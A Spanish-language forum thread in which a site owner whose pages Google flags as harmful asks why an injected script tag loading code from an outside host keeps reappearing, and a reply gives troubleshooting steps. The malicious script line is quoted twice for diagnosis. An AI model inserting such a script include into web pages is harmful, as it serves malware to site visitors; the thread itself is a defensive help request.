Badware

Hola a todos,

tengo un problema con algunos de los sitios que gestiono.

Google me los muestra en el buscador con un mensaje de advertencia de que puede ser un sitio atacante, o que puede dañar los equipos. Ya me ha pasado varias veces.
He revisado el código y he detectado esto:

Código :

<script src=http://whiterat.extra.hu/stat/setupfield.php ></script>

justo entre </head> y <body>

He investigado y me sale una página árabe que al traducirla (chungamente, traducción a cargo de google) habla no se qué de un virus...

La cuestión y la duda es, ya me ha pasado varias veces, si es problema de cuando retoco las páginas en mi ordenador, si tengo algún virus que me introduce esos códigos maliciosos o es que terceros las infectan directamente al estar subidas
en el servidor... ¡No lo sé!

¿Alguien tiene alguna idea al respecto sobre por qué ocurre y de qué manera se puede proteger, evitar, etc?

Yo le he pasado el antivirus a mi ordenador y no me ha detectado nada raro.
No soy ninguna gurú de la informática, pero me resulta raro ser yo la causante del problema... a través de mi ordenador.


Muchas gracias a todos los que me quieran leer y ayudar.
Chao.

El primer paso es asegurarte que no tengas ningún "bicho" (virus) en tu ordenador que te inyecte ese código en tus archivos. Parece que lo has descartado, pero te puedes asegurar creando un archivo de texto sin contenido ninguno, pero sí con las partes necesarias: doctype, head, body, renombras a index.html o .php y lo subes a tu servidor (a una carpeta vacía). Nada más subirlo y otra vez al poco tiempo de estar en tu servido revisa si sigue igual o si ha aparecido el código. Si no es por esta vía el siguiente:

Lo segundo, si en tus páginas usas "aplicaciones de terceros" como relojes, contadores o cualquier otro recurso, sácalos todos y elimina el script. Revisa si aparece de nuevo.
Si no aparece, sólo es cuestión de ir agregando uno a uno esos añadidos de terceros (para saber cuál es el culpable). Esto lo puedes hacer con el archivo que creaste en el primer paso.

Tercero, si tampoco es por aquí como te lo inyectan, contacta con tu proveedor del hosting y explícales lo que te ocurre y los pasos que has dado para solucionarlo, pues quizás tengan un fallo en su seguridad.

Asegúrate antes de las pruebas que has eliminado ese script de todos tus archivos del servidor.

Saludos

Hola, gracias por responderme.

Respecto a lo que me comentas el tema de los virus, y programas espía parece que quedado descartado de momento. He hecho eso que me comentas y lo he mirado, de momento nada pero lo miraré de nuevo mañana a ver. He estado investigado y a través de un blog he visto un artículo que hablaba de lo mismo que me pasa a mí.
Sé que infectan los sites a través del FTP, imagino que desde mi cuenta, pero no sé como ni cómo solucionarlo, de hecho he detectado un archivo en la carpeta de images gifimg.php que parece ser el causante del problema, aunque en otro de los sites no estaba este archivo pero sí el script que puse ayer en el post:

<script src=http://whiterat.extra.hu/stat/setupfield.php ></script>

así que no sé muy bien que hacer, porque yo lo elimino pero mucho me temo que volverá a aparecer.

Ya he contacto con mi proveedor (son dos diferentes en este caso) y me dicen que el problema es mío...
Tampoco utilizo en estos sites en concreto scripts de terceros, así que el quid de la cuestión parece ser un problema de seguridad que no sé cómo solucionar.
Tengo Spybot y Macfee, pero no sé si son buenas opciones. ¿Se te ocurre alguna manera de atajar el problema?

Gracias de nuevo por tu ayuda, un saludo.